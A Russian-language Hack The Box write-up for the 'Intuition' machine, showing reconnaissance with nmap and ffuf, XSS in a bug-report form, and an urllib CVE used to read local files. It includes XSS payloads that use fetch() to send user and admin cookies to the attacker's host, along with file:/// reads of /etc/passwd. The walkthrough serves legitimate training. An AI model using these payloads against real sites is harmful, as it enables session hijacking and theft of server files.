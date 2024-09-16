Се­год­ня я покажу, как повысить пра­ва в Linux через уяз­вимость в ран­нере Ansible. Но преж­де нам понадо­бит­ся заюзать XSS на сай­те сна­чала для получе­ния дос­тупа к стра­нице поль­зовате­ля, а потом для повыше­ния при­виле­гий. Затем исполь­зуем прош­логод­ний баг в биб­лиоте­ке urllib, что­бы читать фай­лы на сер­вере, а для прод­вижения к дру­гому поль­зовате­лю изу­чим логи Suricata.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Intuition с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — слож­ный.

warning

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.15 intuition.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ска­нер нашел два откры­тых пор­та:

  • 22 — служ­ба OpenSSH 8.9p1;
  • 80 — веб‑сер­вер Nginx 1.18.0.

Так­же отме­чаем, что веб‑сер­вер на 80-м пор­те редирек­тит на домен comprezzor.htb, поэто­му добавим его в файл /etc/hosts.

10.10.11.15 intuition.htb comprezzor.htb

Пе­рехо­дим к сай­ту на веб‑сер­вере и сра­зу получа­ем фор­му для заг­рузки фай­лов.

Главная страница сайта
Глав­ная стра­ница сай­та
 

Точка входа

Ни­же на стра­нице есть ссыл­ка на фор­му, куда мож­но отправ­лять информа­цию о най­ден­ных багах.

Информация для связи
Ин­форма­ция для свя­зи

Ссыл­ка ведет на сайт report.comprezzor.htb, поэто­му, преж­де чем идти смот­реть на него, сно­ва добавим запись в файл /etc/hosts.

10.10.11.15 intuition.htb comprezzor.htb report.comprezzor.htb
Главная страница сайта report.comprezzor.htb
Глав­ная стра­ница сай­та report.comprezzor.htb

Так как мы уже наш­ли сайт на под­домене report, есть смысл проб­рутить под­домены по спис­ку: так мы смо­жем най­ти еще боль­ше сай­тов, а соот­ветс­твен­но, и боль­ше точек вхо­да. Под­бирать под­домены будем с помощью ути­литы ffuf.

Справка: сканирование веба c ffuf

Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB.

Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры:

  • -w — сло­варь (я исполь­зую сло­вари из набора SecLists);
  • -t — количес­тво потоков;
  • -u — URL;
  • -H — HTTP-заголо­вок.

Мес­то перебо­ра помеча­ется сло­вом FUZZ.

За­даем все нуж­ные парамет­ры:

ffuf -u http://comprezzor.htb/ -H 'Host: FUZZ.comprezzor.htb' -w subdomains-bitquark-top100000.txt -t 256
Результат сканирования поддоменов
Ре­зуль­тат ска­ниро­вания под­доменов

В вывод прог­раммы попада­ют абсо­лют­но все сло­ва из спис­ка, поэто­му необ­ходимо добавить филь­тр, нап­ример по раз­меру стра­ницы (параметр -fs).

ffuf -u http://comprezzor.htb/ -H 'Host: FUZZ.comprezzor.htb' -w subdomains-bitquark-top100000.txt -t 256 -fs 178
Результат сканирования поддоменов
Ре­зуль­тат ска­ниро­вания под­доменов

На­ходим еще два под­домена. Обновля­ем запись в фай­ле /etc/hosts и наконец идем смот­реть сай­ты.

10.10.11.15 intuition.htb comprezzor.htb report.comprezzor.htb auth.comprezzor.htb dashboard.comprezzor.htb

На auth.comprezzor.htb нас встре­чает фор­ма авто­риза­ции, а dashboard.comprezzor.htb недос­тупен даже пос­ле регис­тра­ции и авто­риза­ции.

Главная страница auth.comprezzor.htb
Глав­ная стра­ница auth.comprezzor.htb

Ку­да инте­рес­нее фор­ма отправ­ки отче­тов, так как ее мож­но потес­тировать на раз­ные уяз­вимос­ти.

Форма отправки отчетов
Фор­ма отправ­ки отче­тов

По логике, если отчет кто‑то прос­матри­вает, мы можем поп­робовать про­экс­плу­ати­ровать уяз­вимость XSS. Для это­го запус­тим локаль­ный веб‑сер­вер:

python3 -m http.server

И отпра­вим наг­рузку, которая дол­жна будет выпол­нить зап­рос на этот веб‑сер­вер.

<img src=x onerror='fetch("http://10.10.16.22:8000/test_xss")' />
Форма отправки отчетов
Фор­ма отправ­ки отче­тов
Логи веб-сервера
Ло­ги веб‑сер­вера

На веб‑сер­вер при­шел зап­рос, а зна­чит, на сай­те есть XSS. Недол­го думая, поп­робу­ем ста­щить куки поль­зовате­ля.

<img src=x onerror='fetch("http://10.10.16.22:8000/test_xss" + document.cookie)' />
Логи веб-сервера
Ло­ги веб‑сер­вера

В логах появ­ляет­ся длин­ная стро­ка. Заг­ружа­ем куки в бра­узер, пометив, что они пред­назна­чены для сай­та dashboard, и перехо­дим на этот сайт.

Главная страница сайта dashboard.comprezzor.htb
Глав­ная стра­ница сай­та dashboard.comprezzor.htb
 

Точка опоры

 

Повышение привилегий

На стра­нице мы можем смот­реть сами отче­ты, перехо­дя по ссыл­кам в Report ID. При этом на стра­нице самого отче­та мож­но повысить его при­ори­тет.

Страница отчета
Стра­ница отче­та

При повыше­нии при­ори­тета отче­та, веро­ятно, его будет изу­чать уже адми­нис­тра­тор. А зна­чит, мы смо­жем пов­торить трюк с XSS и получить cookie. Откро­ем отчет и повысим его при­ори­тет, и, ког­да адми­нис­тра­тор перей­дет к нему, мы получим его куки.

<img src=x onerror='fetch("http://10.10.16.22:8000/test_xss" + document.cookie)' />
Повышение приоритета отчета
По­выше­ние при­ори­тета отче­та
Логи веб-сервера
Ло­ги веб‑сер­вера

При­меня­ем куки в хра­нили­ще бра­узе­ра Chrome и обновля­ем стра­ницу. Теперь нам дос­тупен дру­гой даш­борд, а так­же нес­коль­ко новых фун­кций.

Панель администратора сайта
Па­нель адми­нис­тра­тора сай­та

Од­на из инте­рес­ных воз­можнос­тей — это сос­тавле­ние отче­та в PDF по пре­дос­тавлен­ному URL.

Пер­вой моей иде­ей было про­верить, нет ли тут SSRF, и поп­робовать ста­щить локаль­ные фай­лы через схе­му file:///. Прав­да, это резуль­татов не дало.

Страница создания PDF-файлов
Стра­ница соз­дания PDF-фай­лов

Поп­робу­ем прис­лать тес­товый зап­рос на свой лис­тенер. Запус­тим его:

nc -nlvp 8000

Об­рати вни­мание на исполь­зуемую на сер­вере биб­лиоте­ку — Python-urllib/3.11. Ее мож­но уви­деть в HTTP-заголов­ке User-Agent.

Запрос с сервера
Зап­рос с сер­вера

В этой биб­лиоте­ке в прош­лом году наш­ли уяз­вимость CVE-2023-24329.

Поиск эксплоитов в Google
По­иск экс­пло­итов в Google

Я поис­кал экс­пло­иты в Google и лег­ко отыс­кал под­ходящий. Если URL будет начинать­ся с про­бела, то мы смо­жем читать локаль­ные фай­лы через « file:///».

Получение содержимого файла /etc/passwd
По­луче­ние содер­жимого фай­ла /etc/passwd
 

LFI

Так как мы работа­ем с при­ложе­нием на Python, хорошо бы взгля­нуть на исходный код. А для это­го нуж­но знать, где в фай­ловой сис­теме находит­ся при­ложе­ние. Давай гля­нем файл /proc/self/cmdline — там содер­жится коман­дная стро­ка для текуще­го про­цес­са.

Содержимое /proc/self/cmdline
Со­дер­жимое /proc/self/cmdline

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